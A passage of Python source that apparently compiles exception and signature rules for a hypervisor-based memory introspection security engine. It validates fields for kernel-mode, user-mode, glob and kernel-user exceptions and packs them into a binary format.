"sud-modification"
):
raise ValueError("Type %s requires a victim name!" % self.object_type)
if self.victim and self.object_type in ("msr", "ssdt", "cr4", "idt", "idt-reg", "gdt-reg", "infinity-hook", "hal-perf-counter", "interrupt-obj"):
raise ValueError("Type %s must miss victim name!" % self.object_type)
if self.flags is None:
# if no flags are given, then use the default ones
self.flags = DEFAULT_FLAGS["KernelExceptionFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
flagsl = self.flags.split(" ")
if self.object_type == "cr4":
if ("smep" not in flagsl) and ("smap" not in flagsl):
raise ValueError("Type cr4 must flags must contain smap/smep!")
if not any(word in flagsl for word in ("read", "write", "exec")):
self.flags += " write"
if ("non-driver" in flagsl) and ("return-drv" not in flagsl):
# non-driver implies return-drv
self.flags += " return-drv"
if "return-drv" in flagsl:
raise ValueError('"return-drv" is now obsolete. Please use "return"!')
# We moved return to the common area, so add return-drv if needed (for now)
if "return" in flagsl:
self.flags += " return-drv"
if "integrity" in flagsl and self.object_type in ("token-privs", "sud-modification"):
if self.originator:
raise ValueError("Type %s with integrity flag must not have originator!" % self.object_type)
self.originator = "-"
self.originator_name = "-"
elif self.object_type in ("token-privs",) and not self.originator:
raise ValueError("Originator cannot be missing for %s without integrity flag!" % self.object_type)
if self.object_type in ("security-descriptor", "acl-edit"):
if "integrity" in flagsl:
if self.originator:
raise ValueError("Type %s with integrity flag must not have originator!" % self.object_type)
self.originator = "-"
self.originator_name = "-"
else:
raise ValueError("%s only works with integrity flag for now!" % self.object_type)
# sanitize the input
if "linux" in self.flags:
self.victim = self.victim if self.victim else "*"
else:
self.originator = self.originator.lower()
self.originator_name = self.originator_name.lower()
# for sud fields we need case sensitive hashes
if self.object_type in ("sud-modification",):
self.victim = self.victim if self.victim else "*"
else:
self.victim = self.victim.lower() if self.victim else "*"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields.
'originator' field will be separeted into path + name. If only a name
is given then path will be equal with the name. """
self.binary["object"] = excfg.get("Types", "kernel-mode")[self.object_type]
if self.originator != self.originator_name:
bin_name = get_binary_name(self.originator_name, KernelException)
else:
bin_name = get_binary_name(self.originator_name, KernelException)
self.binary["name"] = bin_name
self.binary["path"] = -1
if self.object_type in ("sud-modification"):
self.binary["victim"] = get_binary_name(self.victim, KernelException, wide=False)
elif self.object_type in ("token-privs", "security-descriptor", "acl-edit"):
self.binary["victim"] = get_binary_name(self.victim, KernelException, wide=False, trim=IMAGE_BASE_NAME_LEN)
else:
self.binary["victim"] = get_binary_name(self.victim, KernelException)
self.binary["flags"] = get_binary_flags(self.flags, KernelException)
self.binary["signatures"] = get_binary_signatures(self.signatures)
def __init__(self, originator=None, object_type=None, victim=None, flags=None, signatures=None, **kwargs):
self.originator = originator
self.originator_name = get_name_from_path(self.originator)
self.object_type = object_type
self.victim = victim
self.flags = flags
self.signatures = signatures
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Compares two KernelExceptions. The fields are compared in order:
- originator path, originator name, object, victim, flags
- signatures is ignored! """
value = cmp_unsigned(self.binary["path"], other.binary["path"])
if value:
return value
value = cmp_unsigned(self.binary["name"], other.binary["name"])
if value:
return value
value = cmp_unsigned(self.binary["object"], other.binary["object"])
if value:
return value
value = cmp_unsigned(self.binary["victim"], other.binary["victim"])
if value:
return value
value = cmp_unsigned(self.binary["flags"], other.binary["flags"])
if value:
return value
return 0
def __str__(self):
ret_str = "'%s' (%08x), '%s' (%08x), '%s' (%08x), '%s' (%02d), '%s' (%08x)" % (
self.originator,
self.binary["path"],
self.originator_name,
self.binary["name"],
self.victim,
self.binary["victim"],
self.object_type,
self.binary["object"],
self.flags,
self.binary["flags"],
)
if self.signatures:
ret_str += ", %r (%r)" % (self.signatures, self.binary["signatures"])
return ret_str
def get_binary_header(self):
""" Returns a binary string representing the header of the user-mode
exception.
The format it's as follows:
- type[8] = 1
- size[16] = 20 + len(sigs) * 4 """
sigs = len(self.signatures) if self.signatures else 0
return struct.pack("<BH", 1, 20 + (sigs * 4))
def get_binary(self):
""" Returns a binary string containing the binary representation of the
kernel-mode exception.
The format it's as follows:
- name[32]
- path[32]
- victim[32],
- flags[32]
- reserved[8]
- type[8]
- sig_count[16]
- sigs-array[32 * sig_count]
name, path - a CRC32 will be applied to them
victim - same as name and path
object_type - the corresponding value in the hash map
flags - an OR with the values from the hash map
signatures - the strings will be converted into unique numeric ids """
packed_sigs = bytes()
for sig in self.binary["signatures"]:
packed_sigs += struct.pack("<I", int(sig & 0xFFFFFFFF))
# The '& 0xffffffff' is a quick hack to force unsigned numbers
return (
struct.pack(
"<IIIIBBH",
unsigned(self.binary["name"]),
unsigned(self.binary["path"]),
unsigned(self.binary["victim"]),
unsigned(self.binary["flags"]),
0, # The reserved byte
unsigned(self.binary["object"]),
unsigned(len(self.binary["signatures"])),
)
+ packed_sigs
)
class UserException(IntroObject):
""" Represents a user-mode exception. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values.
Raises ValueError if anything is not valid. """
if not self.originator:
raise ValueError("Originator cannot be missing!")
if not self.object_type:
raise ValueError("Object type cannot be missing!")
if not self.victim and self.object_type in ("process", "module", "module imports"):
raise ValueError("Type %s requires a victim name!" % self.object_type)
if self.victim and self.victim != "*" and self.object_type == "nx_zone":
raise ValueError("Type %s must miss victim name!" % self.object_type)
if not self.process and self.object_type in ("module", "module imports"):
raise ValueError("Process cannot be missing for %s!" % self.object_type)
if self.process and self.object_type == "process":
raise ValueError("Process must be missing for %s!" % self.object_type)
if self.flags is None:
self.flags = DEFAULT_FLAGS["UserExceptionFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
flagsl = self.flags.split(" ")
if not any(word in flagsl for word in ['read', 'write', 'exec']):
if self.object_type == 'nx_zone' or self.object_type == 'process-creation' or self.object_type == 'process-creation-dpi':
self.flags += ' exec'
else:
self.flags += " write"
flagsl = self.flags.split(" ")
# a small sanity check
if self.object_type == "nx_zone" and "exec" not in flagsl:
raise ValueError("nx_zone must have exec flag set: %s" % self.flags)
# sanitize the input
if "linux" in self.flags:
self.victim = self.victim if self.victim else "*"
self.process = self.process if self.process else None
else:
self.originator = self.originator.lower()
self.victim = self.victim.lower() if self.victim else "*"
self.process = self.process.lower() if self.process else None
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["object"] = excfg.get("Types", "user-mode")[self.object_type]
if self.object_type in (
'process', 'thread-context', 'peb32', 'peb64', 'apc-thread', 'process-creation', 'process-creation-dpi', 'instrumentation-callback') and 'module-load' not in self.flags:
if "linux" in self.flags:
self.binary['originator'] = get_binary_name(self.originator, UserException,
wide=False, trim=LIX_COMM_LEN)
else:
self.binary['originator'] = get_binary_name(self.originator, UserException,
wide=False, trim=IMAGE_BASE_NAME_LEN)
else:
self.binary["originator"] = get_binary_name(self.originator, UserException)
if self.object_type in ('process', 'thread-context', 'peb32', 'peb64', 'apc-thread', 'process-creation', 'double-agent', 'process-creation-dpi', 'instrumentation-callback'):
if "linux" in self.flags:
self.binary['victim'] = get_binary_name(self.victim, UserException,
wide=False, trim=LIX_COMM_LEN)
else:
self.binary['victim'] = get_binary_name(self.victim, UserException,
wide=False, trim=IMAGE_BASE_NAME_LEN)
else:
self.binary["victim"] = get_binary_name(self.victim, UserException)
if self.process:
self.binary["process"] = get_binary_name(
self.process, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN
)
else:
self.binary["process"] = 0
self.binary["flags"] = get_binary_flags(self.flags, UserException)
self.binary["signatures"] = get_binary_signatures(self.signatures)
def _fix_name(self, name):
if not name:
return name
if name[0] == "*" and "\\x" in name:
new_name = b""
i = 0
while i < len(name):
# Let it crash in case i + 4 > len(name)... it's invalid after all
if name[i] == "\\" and name[i + 1] == "x":
new_name += bytes([int(name[i + 2 : i + 4], 16)])
i += 4
continue
else:
new_name += name[i].encode()
i += 1
return new_name
return name
def _fix_json_names(self):
self.originator = self._fix_name(self.originator)
self.victim = self._fix_name(self.victim)
self.process = self._fix_name(self.process)
def __init__(
self,
originator,
object_type,
victim=None,
process=None,
flags=None,
signatures=None,
**kwargs
):
self.originator = originator
self.object_type = object_type
self.victim = victim
self.process = process
self.flags = flags
self.signatures = signatures
self.binary = {}
self._validate_args()
self._fix_json_names()
self._complete_binary_args()
def _cmp(self, other):
""" Compares two UserExceptions by the binary value of the fields.
The fields are compared in the following order:
- originator, object, victim, process, flags.
- signatures is ignored! """
value = cmp_unsigned(self.binary["originator"], other.binary["originator"])
if value:
return value
value = cmp_unsigned(self.binary["object"], other.binary["object"])
if value:
return value
value = cmp_unsigned(self.binary["victim"], other.binary["victim"])
if value:
return value
value = cmp_unsigned(self.binary["process"], other.binary["process"])
if value:
return value
value = cmp_unsigned(self.binary["flags"], other.binary["flags"])
if value:
return value
return 0
def __str__(self):
ret_str = "'%s' (%08x), '%s' (%08x), '%s' (%08x), '%s' (%02d), '%s' (%08x)" % (
self.originator,
self.binary["originator"],
self.victim,
self.binary["victim"],
self.process,
self.binary["process"],
self.object_type,
self.binary["object"],
self.flags,
self.binary["flags"],
)
if self.signatures:
ret_str += ", %r (%r)" % (self.signatures, self.binary["signatures"])
return ret_str
def get_binary_header(self):
""" Returns a binary string representing the header of the user-mode
exception.
The format it's as follows:
- type[8] = 2
- size[16] = 20 + len(sigs) * 4 """
sigs = len(self.signatures) if self.signatures else 0
return struct.pack("<BH", 2, 20 + (sigs * 4))
def get_binary(self):
""" Returns a binary string containing the binary representation of the
user-mode exception.
The format it's as follows:
- originator[32]
- victim[32]
- process[32],
- flags[32]
- reserved[8]
- type[8]
- sig_count[8]
- sigs-array[32 * sig_count]
process - truncated to 15 chars (including NULL terminator)
victim - if object_type is 'process' then it will be truncated same as 'process'
originator, - same as victim
object_type - the corresponding value in the hash map
flags - an OR with the values from the hash map
signatures - the strings will be converted into unique numeric ids """
packed_sigs = bytes()
for sig in self.binary["signatures"]:
packed_sigs += struct.pack("<I", unsigned(sig))
if "ignore" in self.flags:
print(self)
# The '& 0xffffffff' is a quick hack to force unsigned numbers
return (
struct.pack(
"<IIIIBBH",
unsigned(self.binary["originator"]),
unsigned(self.binary["victim"]),
unsigned(self.binary["process"]),
unsigned(self.binary["flags"]),
0, # The reserved byte
unsigned(self.binary["object"]),
unsigned(len(self.binary["signatures"])),
)
+ packed_sigs
)
class UserApcException(IntroObject):
""" Represents a user-mode exception. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values.
Raises ValueError if anything is not valid. """
if not self.originator:
raise ValueError("Originator cannot be missing!")
if not self.object_type:
raise ValueError("Object type cannot be missing!")
if not self.victim and self.object_type in ("process", "module", "module imports"):
raise ValueError("Type %s requires a victim name!" % self.object_type)
if self.victim and self.object_type == "nx_zone":
raise ValueError("Type %s must miss victim name!" % self.object_type)
if not self.process and self.object_type in ("module", "module imports"):
raise ValueError("Process cannot be missing for %s!" % self.object_type)
if self.process and self.object_type == "process":
raise ValueError("Process must be missing for %s!" % self.object_type)
if self.flags is None:
self.flags = DEFAULT_FLAGS["UserExceptionFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
flagsl = self.flags.split(" ")
if not any(word in flagsl for word in ["read", "write", "exec"]):
if self.object_type == "nx_zone":
self.flags += " exec"
else:
self.flags += " write"
flagsl = self.flags.split(" ")
# a small sanity check
if self.object_type == "nx_zone" and "exec" not in flagsl:
raise ValueError("nx_zone must have exec flag set: %s" % self.flags)
# sanitize the input
if "linux" in self.flags:
self.victim = self.victim if self.victim else "*"
self.process = self.process if self.process else None
else:
self.originator = self.originator.lower()
self.victim = self.victim.lower() if self.victim else "*"
self.process = self.process.lower() if self.process else None
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["object"] = excfg.get("Types", "user-mode")[self.object_type]
if (
self.object_type in ("process", "thread-context", "peb32", "peb64", "apc-thread", "double-agent", "instrumentation-callback")
and "module-load" not in self.flags
):
self.binary["originator"] = get_binary_name(
self.originator, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN
)
else:
self.binary["originator"] = get_binary_name(self.originator, UserException)
if self.object_type in ("process", "thread-context", "peb32", "peb64", "apc-thread", "double-agent", "instrumentation-callback"):
self.binary["victim"] = get_binary_name(
self.victim, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN
)
else:
self.binary["victim"] = get_binary_name(self.victim, UserException)
if self.process:
self.binary["process"] = get_binary_name(
self.process, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN
)
else:
self.binary["process"] = 0
self.binary["flags"] = get_binary_flags(self.flags, UserException)
self.binary["signatures"] = get_binary_signatures(self.signatures)
def __init__(
self,
originator,
object_type,
victim=None,
process=None,
flags=None,
signatures=None,
**kwargs
):
self.originator = originator
self.object_type = object_type
self.victim = victim
self.process = process
self.flags = flags
self.signatures = signatures
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Compares two UserExceptions by the binary value of the fields.
The fields are compared in the following order:
- originator, object, victim, process, flags.
- signatures is ignored! """
value = cmp_unsigned(self.binary["originator"], other.binary["originator"])
if value:
return value
value = cmp_unsigned(self.binary["object"], other.binary["object"])
if value:
return value
value = cmp_unsigned(self.binary["victim"], other.binary["victim"])
if value:
return value
value = cmp_unsigned(self.binary["process"], other.binary["process"])
if value:
return value
value = cmp_unsigned(self.binary["flags"], other.binary["flags"])
if value:
return value
return 0
def __str__(self):
ret_str = "'%s' (%08x), '%s' (%08x), '%s' (%08x), '%s' (%02d), '%s' (%08x)" % (
self.originator,
self.binary["originator"],
self.victim,
self.binary["victim"],
self.process,
self.binary["process"],
self.object_type,
self.binary["object"],
self.flags,
self.binary["flags"],
)
if self.signatures:
ret_str += ", %r (%r)" % (self.signatures, self.binary["signatures"])
return ret_str
def get_binary_header(self):
""" Returns a binary string representing the header of the user-mode
exception.
The format it's as follows:
- type[8] = 9
- size[16] = 20 + len(sigs) * 4 """
sigs = len(self.signatures) if self.signatures else 0
return struct.pack("<BH", 9, 20 + (sigs * 4))
def get_binary(self):
""" Returns a binary string containing the binary representation of the
user-mode exception.
The format it's as follows:
- originator[32]
- victim[32]
- process[32],
- flags[32]
- reserved[8]
- type[8]
- sig_count[8]
- sigs-array[32 * sig_count]
process - truncated to 15 chars (including NULL terminator)
victim - if object_type is 'process' then it will be truncated same as 'process'
originator, - same as victim
object_type - the corresponding value in the hash map
flags - an OR with the values from the hash map
signatures - the strings will be converted into unique numeric ids """
packed_sigs = bytes()
for sig in self.binary["signatures"]:
packed_sigs += struct.pack("<I", unsigned(sig))
if "ignore" in self.flags:
print(self)
# The '& 0xffffffff' is a quick hack to force unsigned numbers
return (
struct.pack(
"<IIIIBBH",
unsigned(self.binary["originator"]),
unsigned(self.binary["victim"]),
unsigned(self.binary["process"]),
unsigned(self.binary["flags"]),
0, # The reserved byte
unsigned(self.binary["object"]),
unsigned(len(self.binary["signatures"])),
)
+ packed_sigs
)
class UserGlobException(IntroObject):
""" Represents a user-mode exception (glob match). For more details about it's
implementation see `get_binary`. """
def _validate_glob(self, pattern):
pattern_chars = re.sub(r"\[[^]]+\]|\?", "", pattern)
items = re.findall(r"\[[^]]+\]|\?", pattern)
if len(pattern_chars) + len(items) > IMAGE_BASE_NAME_LEN:
raise ValueError("Pattern too long: %s" % pattern)
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values.
Raises ValueError if anything is not valid. """
glob_items = ["*", "[", "]", "?", "\\\\"]
if not self.originator:
raise ValueError("Originator cannot be missing!")
if not self.object_type:
raise ValueError("Object type cannot be missing!")
if not self.victim and self.object_type in ("process", "module", "module imports"):
raise ValueError("Type %s requires a victim name!" % self.object_type)
if self.victim and self.object_type == "nx_zone":
raise ValueError("Type %s must miss victim name!" % self.object_type)
if not self.process and self.object_type in ("module", "module imports"):
raise ValueError("Process cannot be missing for %s!" % self.object_type)
if self.process and self.object_type == "process":
raise ValueError("Process must be missing for %s!" % self.object_type)
self.process = self.process if self.process else ""
if not any(item in self.originator + self.victim + self.process for item in glob_items):
raise ValueError(
"At least one field (process, originator, victim) must contain glob items(*, ?, [, ] )."
)
if self.process:
self._validate_glob(self.process)
if self.victim:
self._validate_glob(self.victim)
if self.originator:
self._validate_glob(self.originator)
if self.flags is None:
self.flags = DEFAULT_FLAGS["UserExceptionFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
flagsl = self.flags.split(" ")
if not any(word in flagsl for word in ["read", "write", "exec"]):
if self.object_type == "nx_zone" or self.object_type == 'process-creation' or self.object_type == 'process-creation-dpi':
self.flags += " exec"
else:
self.flags += " write"
flagsl = self.flags.split(" ")
# a small sanity check
if self.object_type == "nx_zone" and "exec" not in flagsl:
raise ValueError("nx_zone must have exec flag set: %s" % self.flags)
self.victim = self.victim if self.victim else "*"
self.process = self.process if self.process != "" else "*"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["object"] = excfg.get("Types", "user-mode")[self.object_type]
if self.object_type in ("process", "thread-context") and "module-load" not in self.flags:
self.binary["originator"] = self.originator
else:
self.binary["originator"] = self.originator
if self.object_type in ("process", "thread-context"):
self.binary["victim"] = self.victim
else:
self.binary["victim"] = self.victim
if self.process:
self.binary["process"] = self.process
else:
self.binary["process"] = "*"
self.binary["flags"] = get_binary_flags(self.flags, UserGlobException)
self.binary["signatures"] = get_binary_signatures(self.signatures)
def __init__(
self,
originator,
object_type,
victim=None,
process=None,
flags=None,
signatures=None,
**kwargs
):
self.originator = originator
self.object_type = object_type
self.victim = victim
self.process = process
self.flags = flags
self.signatures = signatures
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Compares two UserGlobException by the binary value of the fields.
The fields are compared in the following order:
- originator, object, victim, process, flags.
- signatures is ignored! """
value = cmp_string(self.binary["originator"], other.binary["originator"])
if value:
return value
value = cmp_string(self.binary["object"], other.binary["object"])
if value:
return value
value = cmp_string(self.binary["victim"], other.binary["victim"])
if value:
return value
value = cmp_string(self.binary["process"], other.binary["process"])
if value:
return value
value = cmp_unsigned(self.binary["flags"], other.binary["flags"])
if value:
return value
return 0
def __str__(self):
ret_str = "'%s' (%s), '%s' (%s), '%s' (%s), '%s' (%02d), '%s' (%08x)" % (
self.originator,
self.binary["originator"],
self.victim,
self.binary["victim"],
self.process,
self.binary["process"],
self.object_type,
self.binary["object"],
self.flags,
self.binary["flags"],
)
if self.signatures:
ret_str += ", %r (%r)" % (self.signatures, self.binary["signatures"])
return ret_str
def get_binary_header(self):
""" Returns a binary string representing the header of the user-mode (glob match)
exception.
The format it's as follows:
- type[8] = 6
- size[16] = 8 + len(originator) + len(victim) + len(process) len(sigs) * 4 """
sigs = len(self.signatures) if self.signatures else 0
len_victim = len(self.victim) + 1 if self.victim else 0
len_originator = len(self.originator) + 1 if self.originator else 0
len_process = len(self.process) + 1 if self.process else 0
size = 8 + len_originator + len_victim + len_process
return struct.pack("<BH", 6, size + (sigs * 4))
def get_binary(self):
""" Returns a binary string containing the binary representation of the
user-mode exception (glob match).
The format it's as follows:
- flags[32]
- reserved[8]
- type[8]
- sig_count[8]
- originator[32]
- victim[32]
- process[32],
- sigs-array[32 * sig_count]
process - regex
victim - regex
originator - regex
object_type - the corresponding value in the hash map
flags - an OR with the values from the hash map
signatures - the strings will be converted into unique numeric ids """
packed_sigs = bytes()
for sig in self.binary["signatures"]:
packed_sigs += struct.pack("<I", unsigned(sig))
if "ignore" in self.flags:
print(self)
# The '& 0xffffffff' is a quick hack to force unsigned numbers
return (
struct.pack(
"<IBBH%ds%ds%ds"
% (
len(self.binary["originator"]) + 1, # add NULL-terminator
len(self.binary["victim"]) + 1, # add NULL-terminator
len(self.binary["process"]) + 1,
), # add NULL-terminator
unsigned(self.binary["flags"]),
0, # The reserved byte
unsigned(self.binary["object"]),
unsigned(len(self.binary["signatures"])),
bytes(self.binary["originator"], "utf-8"),
bytes(self.binary["victim"], "utf-8"),
bytes(self.binary["process"], "utf-8"),
)
+ packed_sigs
)
class KernelUserException(IntroObject):
""" Represents a kernel-user exception. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values.
Raises ValueError if anything is not valid. """
if not self.originator:
raise ValueError("Originator cannot be missing!")
if not self.object_type:
raise ValueError("Object type cannot be missing!")
if not self.victim:
raise ValueError("Victim cannot be missing!" % self.object_type)
if self.flags is None:
# if no flags are given, then use the default ones
self.flags = DEFAULT_FLAGS["KernelExceptionFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
flagsl = self.flags.split(" ")
if not any(word in flagsl for word in ("read", "write", "exec")):
self.flags += " write"
if ("non-driver" in flagsl) and ("return-drv" not in flagsl):
# non-driver implies return-drv
self.flags += " return-drv"
if "return" in flagsl:
self.flags += " return-drv"
if "user" in flagsl and "kernel" in flagsl:
raise ValueError("Both user and kernel injection flags were given!")
if "linux" in self.flags:
self.victim = self.victim if self.victim else "*"
self.originator = self.originator if self.originator else "*"
self.process = self.process if self.process else "*"
else:
self.originator = self.originator.lower()
self.victim = self.victim.lower() if self.victim else "*"
self.process = self.process.lower() if self.process else "*"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields.
'originator' field will be separeted into path + name. If only a name
is given then path will be equal with the name. """
self.binary["object"] = excfg.get("Types", "kernel-user-mode")[self.object_type]
if "user" in self.flags:
self.binary["originator"] = get_binary_name(self.originator, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN)
else:
self.binary["originator"] = get_binary_name(self.originator, KernelException)
self.binary["victim"] = get_binary_name(self.victim, UserException)
self.binary["flags"] = get_binary_flags(self.flags, KernelUserException)
self.binary["signatures"] = get_binary_signatures(self.signatures)
self.binary["process"] = get_binary_name(self.process, UserException, wide=False, trim=IMAGE_BASE_NAME_LEN)
def __init__(self, process=None, originator=None, object_type=None, victim=None, flags=None, signatures=None, **kwargs):
self.originator = originator
self.object_type = object_type
self.process = process
self.victim = victim
self.flags = flags
self.signatures = signatures
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Compares two KernelExceptions. The fields are compared in order:
- originator path, originator name, object, victim, flags
- signatures is ignored! """
value = cmp_unsigned(self.binary["originator"], other.binary["originator"])
if value:
return value
value = cmp_unsigned(self.binary["process"], other.binary["process"])
if value:
return value
value = cmp_unsigned(self.binary["object"], other.binary["object"])
if value:
return value
value = cmp_unsigned(self.binary["victim"], other.binary["victim"])
if value:
return value
value = cmp_unsigned(self.binary["flags"], other.binary["flags"])
if value:
return value
return 0
def __str__(self):
ret_str = "'%s' (%08x), '%s' (%08x), '%s' (%08x), '%s' (%02d), '%s' (%08x)" % (
self.process,
self.binary["process"],
self.originator,
self.binary["originator"],
self.victim,
self.binary["victim"],
self.object_type,
self.binary["object"],
self.flags,
self.binary["flags"],
)
if self.signatures:
ret_str += ", %r (%r)" % (self.signatures, self.binary["signatures"])
return ret_str
def get_binary_header(self):
""" Returns a binary string representing the header of the user-mode
exception.
The format it's as follows:
- type[8] = 1
- size[16] = 20 + len(sigs) * 4 """
sigs = len(self.signatures) if self.signatures else 0
return struct.pack("<BH", 14, 20 + (sigs * 4))
def get_binary(self):
""" Returns a binary string containing the binary representation of the
kernel-mode exception.
The format it's as follows:
- name[32]
- path[32]
- victim[32],
- flags[32]
- reserved[8]
- type[8]
- sig_count[16]
- sigs-array[32 * sig_count]
name, path - a CRC32 will be applied to them
victim - same as name and path
object_type - the corresponding value in the hash map
flags - an OR with the values from the hash map
signatures - the strings will be converted into unique numeric ids """
packed_sigs = bytes()
for sig in self.binary["signatures"]:
packed_sigs += struct.pack("<I", int(sig & 0xFFFFFFFF))
# The '& 0xffffffff' is a quick hack to force unsigned numbers
return (
struct.pack(
"<IIIIBBH",
unsigned(self.binary["originator"]),
unsigned(self.binary["victim"]),
unsigned(self.binary["process"]),
unsigned(self.binary["flags"]),
0, # The reserved byte
unsigned(self.binary["object"]),
unsigned(len(self.binary["signatures"])),
)
+ packed_sigs
)
class Signature(IntroObject):
""" Represents an exception signature. For more details about it's implementation see it's
subclasses. """
def _cmp(self, other):
pass
def get_binary_header(self):
pass
def get_binary(self):
pass
class ExportSignature(Signature):
""" Represents an export signature. For more details about it's implementation see
`get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError("id is required!")
if not self.hashes:
raise ValueError("hashes is required!")
if not self.library:
raise ValueError("library is required!")
if not self.flags:
self.flags = DEFAULT_FLAGS["SignatureFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "export"))
self.binary["flags"] = get_binary_flags(self.flags, Signature)
self.binary["library"] = get_binary_name(self.library, UserException, wide=True)
self.binary["hashes"] = []
for hl in self.hashes:
int_hash_list = []
int_hash_list.append(
{
"name": get_binary_name(hl["name"], Signature, wide=False),
"delta": int(hl["delta"]),
}
)
self.binary["hashes"].append(int_hash_list)
def __init__(self, sig_id, hashes, library, flags=None, **kwargs):
self.sig_id = sig_id
self.library = library
self.hashes = hashes
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary["id"], other.binary["id"])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), '%s' (%08x), %r" % (
self.sig_id,
self.binary["id"],
self.library,
self.binary["library"],
self.flags,
self.binary["flags"],
self.binary["hashes"],
)
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 3
- size[16] = 12/10 + len(hashes) + hash_size * total_size_of_hashes """
struct_size = 16
hashes_size = len(self.hashes) * 8
return struct.pack("<BH", 4, struct_size + hashes_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
The format it's as follows:
- id[32]
- flags[32]
- score[8]
- hash_list_count[8]
- hash-list-array[32 * hash_count] """
packed_hashes = bytes()
for hash_list in self.binary["hashes"]:
for helem in hash_list:
packed_hashes += struct.pack("<HHI", helem["delta"], 0, unsigned(helem["name"]))
return (
struct.pack(
"<IIIBBBB",
unsigned(self.binary["id"]),
unsigned(self.binary["flags"]),
unsigned(self.binary["library"]),
unsigned(len(self.binary["hashes"])),
0,
0,
0,
)
+ packed_hashes
)
class ValueSignature(Signature):
""" Represents a value signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError("id is required!")
if self.score == 0:
raise ValueError("score is required!")
if not self.hashes:
raise ValueError("hashes is required!")
if not self.flags:
self.flags = DEFAULT_FLAGS["SignatureFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "value"))
self.binary["flags"] = get_binary_flags(self.flags, Signature)
self.binary["hashes"] = []
for hlist in self.hashes:
int_hash_list = []
inj_hash = hlist
inj_hash["hash"] = int(hlist["hash"], 16)
int_hash_list.append(inj_hash)
self.binary["hashes"].append(int_hash_list)
def __init__(self, sig_id, hashes, score=0, flags=None, **kwargs):
self.sig_id = sig_id
self.score = score
self.hashes = hashes
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary["id"], other.binary["id"])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), %02d, %r" % (
self.sig_id,
self.binary["id"],
self.flags,
self.binary["flags"],
self.score,
self.binary["hashes"],
)
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 3
- size[16] = 12/10 + len(hashes) + hash_size * total_size_of_hashes """
struct_size = 12
hashes_size = len(self.hashes) * 12
return struct.pack("<BH", 5, struct_size + hashes_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
The format it's as follows:
- id[32]
- flags[32]
- score[8]
- hash_list_count[8]
- hash-list-array[32 * hash_count] """
packed_hashes = bytes()
for hash_list in self.binary["hashes"]:
for he in hash_list:
packed_hashes += struct.pack("<HHII", he["offset"], he["size"], 0, he["hash"])
return (
struct.pack(
"<IIBBBB",
unsigned(self.binary["id"]),
unsigned(self.binary["flags"]),
unsigned(self.score),
unsigned(len(self.binary["hashes"])),
0,
0,
)
+ packed_hashes
)
class CbSignature(Signature):
""" Represents a codeblocks signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError("id is required!")
if self.score == 0:
raise ValueError("score is required!")
if not self.hashes:
raise ValueError("hashes is required!")
if not self.flags:
self.flags = DEFAULT_FLAGS["SignatureFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "codeblocks"))
self.binary["flags"] = get_binary_flags(self.flags, Signature)
self.binary["hashes"] = []
for hl in self.hashes:
int_hash_list = []
for he in hl:
int_hash_list.append(int(he, 16))
int_hash_list.sort()
self.binary["hashes"].append(int_hash_list)
